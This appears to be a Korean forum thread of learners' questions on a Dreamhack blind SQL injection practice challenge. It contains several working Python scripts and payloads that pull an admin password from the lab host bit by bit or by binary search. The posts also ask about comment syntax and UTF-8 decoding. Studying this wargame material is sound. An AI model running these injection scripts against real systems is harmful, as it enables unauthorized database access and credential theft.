admin' and 1=1-- 은 안되고 admin' and 1=1-- - 해야 되는 이유가 뭘까요?? 너무 궁금합니다 ㅠㅠ

import requests keys=[] for i in range(1,20): key='' for j in range(1,20): url=f"http://host3.dreamhack.games:9393/?uid=admin' and substr(bin(ord(substr(upw,{i},1))),{j},1)='1" a=requests.get(url=url) if a.text.find('exists')!=-1: key+="1" else: url=f"http://host3.dreamhack.games:9393/?uid=admin' and substr(bin(ord(substr(upw,{i},1))),{j},1)='0" a=requests.get(url=url) if a.text.find('exists')!=-1: key+="0" else: break keys.append(key) print(keys) results = [] for i in keys: result = 0 length = len(i) - 1 for j in i: if length == 0: result += int(j) * 1 else: result += int(j) * (2 ** int(length)) length -= 1 results.append(result) print(results) key = "" for i in results: key += chr(i) print(key) 이렇게 작성하고 돌렸는데 ['1000100', '1001000', '1111011', '1110110010011101101', '1110101010110010100', '1110110010011101101', '1110101110111001100', '1110101110110000100', '1110101110110010100', '1110110110011000101', '100001', '111111', '1111101', '0', '0', '0', '0', '0', '0'] [68, 72, 123, 484589, 480660, 484589, 482764, 482692, 482708, 486597, 33, 63, 125, 0, 0, 0, 0, 0, 0] DH{񶓭񵖔񶓭񵷌񵶄񵶔񶳅!?} 왜 한글부분이 비트가 비정상적으로 많이 나오는지 모르겠어요 고수분들 제발 알려주세요!!

안녕하세요. 본 문제에서 여러가지 코드를 입력해보면 Internal Server Error The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application. 이런 식의 에러가 나올때가 있는데 그 기준이 어떻게 되는지 알고 싶습니다. 감사합니다~

해당 풀이에서 Big Endian 형태로 변환을 해야 된다고 하는데 왜 필요한지 설명해주실 분 계신가요?

문자열은 0부터 시작한다고 알고있는데 암호를 구하려면 for i in range(0, len_pw): substr(upw, {i}, 1) 이런 형태가 되어야 하는 거 아닌가요? 왜 해설에서는 범위를 1부터 시작해서 substr(upw, 1, 1) 부터 찾는 지 이해가 가지 않습니다. 범위의 끝이 len_pw+1 이 되어 substr(upw, len_pw+1, 1)이 되면 문자가 없는 부분이 아닌가요? 어렵네요...

안녕하세요. 이 문제를 풀다가 마지막 구문이 이해가 되지 않아서 이렇게 질문을 남깁니다. password += int.to_bytes(int(bits, 2), (bit_length + 7) // 8, "big").decode("utf-8") (1) 구글링을 해보면 int.to_bytes(길이, order, 2의 보수) 이런식으로 쓴다고 나와있는데, 여기서는 어떻게 사용하는 건지 궁금합니다. (2) 야매로 제가 끼워 맞추어보았을때, (bit_length+7)//8을 하는이유가, 총 7비트가 1개의 블록이라고 앞에서 배웠는데, 이를 나눠주기 위해 사용하는건가요? (3) 그리고 또한 만약 이렇게 계산한다면, decode utf8을 할때 한번에 이루어지나요? 아니면 따로 따로 이루어지나요? 열심히 공부해보겠습니다..ㅜ

다른 부분은 이해를 했는데 마지막에 작성된 passwd += int.to_bytes(int(bit, 2), (bit_length + 7) // 8, "big").decode("utf-8") 이 부분이 이해가 되지 않습니다.. 알기 쉽게 자세히 설명을 부탁드려도 될까요? 감사합니다!

for i in range(50): res=requests.get(f"{url}?uid=admin' and char_length(upw)={i} #") if('exists' in res.text): print(i) break while(1): query={"uid" : f"admin' and char_length(upw)={upw_len} #"} res=requests.get(url, params=query) if('exists' in res.text): print(upw_len) break upw_len+=1 위의 코드는 실행이 안되고 아래 코드는 강의에 있는 코드입니다. 위의 코드는 Error 500이 뜨고 아래 코드는 제대로 실행이 되는데 왜 그런 결과가 나오는지 모르겠습니다.

import os import requests URL = "http://host3.dreamhack.games:17636/?uid=" def binary_search(arr,n): low, high = 0, len(arr) - 1 while low <= high: mid = (low + high) // 2 mid_value = arr[mid] BIG = Big(Payload(n,mid_value),mid_value) if Big("%7D%27+or+uid%3D%27admin%27+and+ascii%28substr%28upw%2C{}%2C1%29%29={}%23".format(n,mid_value),mid_value): return (chr(arr[low])) elif not BIG: low = mid + 1 # 중간값이 타겟보다 작으면 오른쪽 반을 탐색 else: high = mid - 1 # 중간값이 타겟보다 크면 왼쪽 반을 탐색 return "" # low 반환 def Payload(n,i): return "%7D%27+or+uid%3D%27admin%27+and+ascii%28substr%28upw%2C{}%2C1%29%29<{}%23".format(n,i) def Big(PAYLOAD,i): global URL,answer print("Payload : ",answer+chr(i)) res=requests.get(URL+PAYLOAD,"") if "exist" in (res.text): return True else: return False answer='' for n in range(1,30): if Big(Payload(n,126),126): ans = binary_search(range(32,127),n) elif Big(Payload(n,50813),50813): ans = binary_search(range(44032,50813),n) answer+=ans print("FLAG : "+answer) 조잡하게 보이실 수 있는데.. 이진탐색으로 blind-sql injection하는 코드입니다. DH{ 까지는 잘 나오는데, 한글부터 안나옵니다. 그래서 혹시 한글이 아닌가 해서 코드로 해당 문자의 범위를 찾아봤는데, 한글보다 작고 아스키코드보다 큰 범위로 나왔습니다. 뭐가 잘못된걸까요..?

image.png 아스키 코드는 7비트로 이루어져 있으니 최대 7번의 요청이 아닌가요..?